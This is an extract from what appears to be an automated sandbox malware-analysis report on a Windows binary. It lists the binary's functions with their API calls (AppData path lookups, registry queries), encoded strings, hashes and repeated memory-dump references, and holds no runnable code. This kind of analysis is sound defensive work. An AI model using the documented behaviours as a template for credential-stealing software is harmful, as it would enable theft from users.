                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 1d99e8de00bb418aad68ad074d22eded8d5ff8f449807358a90a1672430318f7
                                • Instruction ID: 862cd77e3623f18bf9414a967c97b4c22a6b99546fe2a863a496b6407b3c378b
                                • Opcode Fuzzy Hash: 1d99e8de00bb418aad68ad074d22eded8d5ff8f449807358a90a1672430318f7
                                • Instruction Fuzzy Hash: B8417C3090411ADFCB21DFA9D8C4EAEB7B8FF54300B11459DE806AB251DB74AA65CF92
                                Function 009C8050 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 009C80BB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C80EA
                                • StrCmpCA.SHLWAPI(00000000,009E4C3C), ref: 009C8102
                                • lstrlen.KERNEL32(00000000), ref: 009C8140
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C816F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 8a66fccf1886bc6b385c8edfed3eca6c2e3da4d90613bcaf5c1e3803bc7d7000
                                • Instruction ID: e718c818a75c69244094fd35a5d0228c7f0a9ce90239c350c84b98e9f45390aa
                                • Opcode Fuzzy Hash: 8a66fccf1886bc6b385c8edfed3eca6c2e3da4d90613bcaf5c1e3803bc7d7000
                                • Instruction Fuzzy Hash: 7C419E71A00106ABDB21DF68DA88FABBBF8EF44310F15845DA849D7245EF34DD45CB91
                                Function 009D3130 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009D3166
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009D316D
                                • RegOpenKeyExA.ADVAPI32(80000002,010BBCC8,00000000,00020119,?), ref: 009D318C
                                • RegQueryValueExA.ADVAPI32(?,010CDAD0,00000000,00000000,00000000,000000FF), ref: 009D31A7
                                • RegCloseKey.ADVAPI32(?), ref: 009D31B1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: f45526d3f25876b6d0de9b7347e7eee3b010b4ef18b4fe87a6f5427ac7bc1fa5
                                • Instruction ID: 15eb69c1e50a844f853a9891a0727ff612eb739184da7c07440b09e26e89a182
                                • Opcode Fuzzy Hash: f45526d3f25876b6d0de9b7347e7eee3b010b4ef18b4fe87a6f5427ac7bc1fa5
                                • Instruction Fuzzy Hash: A9118276A40245AFD710CF95EC85FBBB7BCE744711F10421AFA09D7380DB7459048BA1
                                Function 009B8980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 009B8996
                                  • Part of subcall function 009DA1C0: std::exception::exception.LIBCMT ref: 009DA1D5
                                  • Part of subcall function 009DA1C0: std::exception::exception.LIBCMT ref: 009DA1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 009B89CD
                                  • Part of subcall function 009DA173: std::exception::exception.LIBCMT ref: 009DA188
                                  • Part of subcall function 009DA173: std::exception::exception.LIBCMT ref: 009DA1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: invalid string position$string too long
                                • API String ID: 2002836212-4289949731
                                • Opcode ID: 6a010678f86a95fa5c69b1564547743b87c8d69f308d22db446abb9a3ad89144
                                • Instruction ID: e5c3f043cedebb0f0afb012e1e22f351ee7b484797d1665f21e8d6a120d8b0b6
                                • Opcode Fuzzy Hash: 6a010678f86a95fa5c69b1564547743b87c8d69f308d22db446abb9a3ad89144
                                • Instruction Fuzzy Hash: 4221E5723006519BCB219AACE940AABF7ADDBE57B1B25093FF141CB281CA71DC41C7A5
                                Function 009B8850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 009B8883
                                  • Part of subcall function 009DA173: std::exception::exception.LIBCMT ref: 009DA188
                                  • Part of subcall function 009DA173: std::exception::exception.LIBCMT ref: 009DA1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: a46371f2b3256f9751a80e6fcd43cdfec84153a0abc15103ffaf40339835dcc1
                                • Instruction ID: 963c7dee075ee0ec0796d3614c63b9d8a2cdfbbbd036f6c09fe1399ce1b45828
                                • Opcode Fuzzy Hash: a46371f2b3256f9751a80e6fcd43cdfec84153a0abc15103ffaf40339835dcc1
                                • Instruction Fuzzy Hash: 8B3195B5E005159BCB08DF58C9916AEBBB6EBC8350F18C269E915AB384DB30AD01CB91
                                Function 009D5910 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 009D5922
                                  • Part of subcall function 009DA173: std::exception::exception.LIBCMT ref: 009DA188
                                  • Part of subcall function 009DA173: std::exception::exception.LIBCMT ref: 009DA1AE
                                • std::_Xinvalid_argument.LIBCPMT ref: 009D5935
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_std::exception::exception
                                • String ID: Sec-WebSocket-Version: 13$string too long
                                • API String ID: 1928653953-3304177573
                                • Opcode ID: 86229bd204d59a8b757cb8a91f89a33043b18e6f194ab61c99f460523e95f07d
                                • Instruction ID: 3c360cbeb6ff65d3ae0ce554384f9008fd31d77dd6773ac06f11453174794d33
                                • Opcode Fuzzy Hash: 86229bd204d59a8b757cb8a91f89a33043b18e6f194ab61c99f460523e95f07d
                                • Instruction Fuzzy Hash: FB117C34348B41CBC7228F2CE810B1AB7E5ABD5760FA64A5BE0D187795CBB1DC41CBA5
                                Function 009D3CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,009DA430,000000FF), ref: 009D3D20
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009D3D27
                                • wsprintfA.USER32 ref: 009D3D37
                                  • Part of subcall function 009D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 009D71FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: f0225e837f02c00963599a15909e509b4ebfd8bc53768931b4ed8fc0a223f6c8
                                • Instruction ID: ba3ba1cfa653efa5a0c994d8482f6fa3fb9bcc37de2529051d0b256dced8ce77
                                • Opcode Fuzzy Hash: f0225e837f02c00963599a15909e509b4ebfd8bc53768931b4ed8fc0a223f6c8
                                • Instruction Fuzzy Hash: 99010071680780BBE7209B94DC8AF6ABB68FB45B22F400115FA059B3D0CBB41900CBA1
                                Function 009B8710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 009B8737
                                  • Part of subcall function 009DA173: std::exception::exception.LIBCMT ref: 009DA188
                                  • Part of subcall function 009DA173: std::exception::exception.LIBCMT ref: 009DA1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: 4a21ed51d5240dc956fc98c864093c62aee66565f65846af8ca6c7df88c636c1
                                • Instruction ID: 4fbffcb6dc9be16b8a5cc728563e40a619d3361caa078d6a49bc1c146d36cdae
                                • Opcode Fuzzy Hash: 4a21ed51d5240dc956fc98c864093c62aee66565f65846af8ca6c7df88c636c1
                                • Instruction Fuzzy Hash: FEF09027B040220F8314643E8EC44DFA94E56E93A433AD765E81AEF359DC70EC82C5D4
                                Function 009CE500 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON
                                Download Yara Rule
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 009CE544
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CE573
                                • lstrcat.KERNEL32(?,00000000), ref: 009CE581
                                • lstrcat.KERNEL32(?,010CDCF0), ref: 009CE59C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: ef3f017eb10d4f5e69dff99a70af3253cc834f554dde42c9e81e40e7d0f06e76
                                • Instruction ID: 902a2677588304540137b20b01d0c6a165dfb5f8ae27efc8cbb8dbf5a9c7bfcd
                                • Opcode Fuzzy Hash: ef3f017eb10d4f5e69dff99a70af3253cc834f554dde42c9e81e40e7d0f06e76
                                • Instruction Fuzzy Hash: E751C9B5A10108AFCB55EF64ED82FEE337DEBC8310F444459B91A9B351DE70AE448BA1
                                Function 009D1FD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 009D1FDF, 009D1FF5, 009D20B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: strlen
                                • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 39653677-4138519520
                                • Opcode ID: e03f46f36392d27c764f996c61efa8b4a25083e7571a03d45a216eec57086af8
                                • Instruction ID: 4f1f9d5acc38e5a56c8f5b8968e614c8f21c5738f43e1dbb7a72b3ddfac5ce93
                                • Opcode Fuzzy Hash: e03f46f36392d27c764f996c61efa8b4a25083e7571a03d45a216eec57086af8
                                • Instruction Fuzzy Hash: 712137399942898FDB20EB35C4446DDF36BEF947A2F84C867C8194B381E3361D0AD796
                                Function 009CEB70 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                                Download Yara Rule
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 009CEBB4
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CEBE3
                                • lstrcat.KERNEL32(?,00000000), ref: 009CEBF1
                                • lstrcat.KERNEL32(?,010CECF0), ref: 009CEC0C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
